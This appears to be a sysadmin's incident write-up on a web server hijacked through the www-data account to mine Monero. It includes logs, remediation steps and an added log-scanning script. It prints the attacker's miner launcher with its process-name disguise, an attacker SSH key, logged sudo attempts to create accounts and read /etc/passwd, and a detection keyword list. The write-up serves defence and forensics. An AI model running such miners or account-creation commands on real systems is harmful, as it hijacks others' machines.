===Warnings===
<pre>
Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 200.187.150.144 port 10248 ssh2
Nov 20 10:53:56 mercury sshd[9291]: Accepted password for www-data from 155.133.82.12 port 51625 ssh2
Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 155.133.82.12 port 57274 ssh2
Nov 20 12:34:46 mercury sshd[12879]: Accepted publickey for www-data from 155.133.82.12 port 57280 ssh2
</pre>

/var/www had a .ssh/ dated 2017-11-20, and this in authorized_keys:

<pre>
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtS6xFlhMDBbJHpbeSKNbs3z3+tv/TEy3dOStR0DxNXNmHG0ub/yJWeV7+1fKW9U4Vmw5xyZAweAm8Firt9174tFViaPmGS/glWfxUcpdCRai7BjIWfxkFyxQVDSndtL3AJBm+0ekTrK+j8QRYzKzyvJUnfL3NSOvsH186ziaB6eTsBhWXUYAiU0y+2z6p/XYfzvs984IWOg/rLbeofRZSdU1Kx2g5Wix7UMS+Oi2UFwTFWvNWstkuNOLPg92DMaMiRgEKycwf1JfUrY8nWI7kwlJz/VO5rE9+J2o7ulI6eDWY5q7+zylKLg4bXnkS7wYYUfEPXobtNLgkZ5SUo6DD root@studiantes
</pre>

The sudo log shows www-data trying to create an account, set its password and read /etc/passwd:

<pre>
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
</pre>

It's this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f

===Conclusions===
* It looks like either the www-data password was guessed, or was set by something running as www-data.

===Actions===
* Add "DenyUsers www-data" to /etc/ssh/sshd_config
* delete /var/www/.ssh
* create ~www-data/.ssh as an empty, root-owned, mode 000 file so nothing can recreate it:
<pre>
---------- 1 root root 0 Nov 28 08:19 .ssh
</pre>

===Symptoms===
* CPU at 100%
* a process called md32 running
* lots of processes named "b" running
* files installed in /tmp/.s/ and /tmp/.b30/
* /tmp/b30.tar moved to ~daniel/
* Logfile "mata" looks like block mining
* Notice a "wallet" config option below

===The Startup===
/tmp/.s/upd looks like:
<pre>
#!/bin/bash
#[+] Miner v2.0 - 2017
#[+] Author: PRG @ #old UnderNet
wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8"
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null &
fi
echo $! > bash.pid
</pre>

The h32/h64 wrapper rewrites the process name, so in ps the miner shows up as "-bash":

<pre>
0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x
</pre>

---

The same useradd / passwd / cat /etc/passwd sequence came back a week later, this time with the account name "ircd":

<pre>
mercury.bonmot.ca : Nov 27 23:21:30 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd
mercury.bonmot.ca : Nov 27 23:21:46 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd
mercury.bonmot.ca : Nov 27 23:22:01 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
mercury.bonmot.ca : Nov 28 02:36:29 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd
mercury.bonmot.ca : Nov 28 02:36:43 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd
mercury.bonmot.ca : Nov 28 02:36:57 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
</pre>
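Both warning signs on this page (sshd accepting a login for www-data, and www-data being refused by sudo while trying useradd / passwd / cat /etc/passwd) are easy to pick out of the logs automatically. The script below is an added example, not part of the original page or of any tool mentioned on it: it parses the two line formats shown above and flags SSH logins by service accounts and denied-sudo attempts, raising the severity when the account is a service account or the command touches account or credential files. The SERVICE_ACCOUNTS list, the SUSPICIOUS_CMDS list and the sample log lines are all constructed for the example (the IPs are from the TEST-NET range, not the addresses on this page).

```python
import re
from dataclasses import dataclass

# Assumption: site-specific list of accounts that must never log in over SSH
# or run sudo. www-data is the one that mattered in this incident.
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon", "apache", "nginx"}

# Assumption: command fragments that, in a denied-sudo line, indicate an attempt
# to add an account, set a password or read credential files.
SUSPICIOUS_CMDS = ("useradd", "passwd", "/etc/passwd", "/etc/shadow")

# "Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 1.2.3.4 port 10248 ssh2"
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)
# "host : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"^(?P<host>\S+) : (?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) : (?P<user>\S+) : "
    r"user NOT in sudoers ; .*?COMMAND=(?P<cmd>.*)$"
)

# Constructed sample input modelled on the two formats on this page.
SAMPLE_LOG = """\
Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 192.0.2.10 port 10248 ssh2
Nov 15 07:02:11 mercury sshd[28031]: Accepted publickey for daniel from 192.0.2.50 port 50122 ssh2
Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 192.0.2.20 port 57274 ssh2
mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" listd
mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd
mercury.bonmot.ca : Nov 21 09:00:00 : daniel : user NOT in sudoers ; TTY=pts/0 ; PWD=/home/daniel ; USER=root ; COMMAND=/bin/ls /root
"""


@dataclass
class Finding:
    kind: str       # "ssh_login" or "sudo_denied"
    ts: str
    user: str
    ip: str         # source address for ssh_login, "" for sudo_denied
    detail: str     # auth method or the attempted command
    severity: str   # "high" or "medium"


def analyse(lines):
    """Return one Finding per line that matches either detection rule."""
    findings = []
    for line in lines:
        line = line.strip()
        m = SSHD_RE.match(line)
        if m:
            # Any accepted login for a service account is high severity; other
            # users' logins are normal and produce no finding.
            if m["user"] in SERVICE_ACCOUNTS:
                findings.append(Finding("ssh_login", m["ts"], m["user"], m["ip"],
                                        f"{m['method']} auth, port {m['port']}", "high"))
            continue
        m = SUDO_RE.match(line)
        if m:
            cmd = m["cmd"]
            escalate = m["user"] in SERVICE_ACCOUNTS or any(s in cmd for s in SUSPICIOUS_CMDS)
            findings.append(Finding("sudo_denied", m["ts"], m["user"], "", cmd,
                                    "high" if escalate else "medium"))
    return findings


def service_account_ips(findings):
    """Distinct source IPs that logged in as a service account (for blocking or lookup)."""
    return sorted({f.ip for f in findings if f.kind == "ssh_login"})


if __name__ == "__main__":
    results = analyse(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"[{f.severity:6}] {f.ts} {f.kind:11} {f.user:10} {f.ip:12} {f.detail}")
    print("service-account login sources:", ", ".join(service_account_ips(results)))
```

Run against real files with something like `analyse(open("/var/log/auth.log"))`; the sudo format above is what sudo writes to its own logfile, so point the second pass at that file (or at the same syslog stream if sudo logs there). On the page's logs this would have fired on the Nov 15 login, five days before the miner appeared.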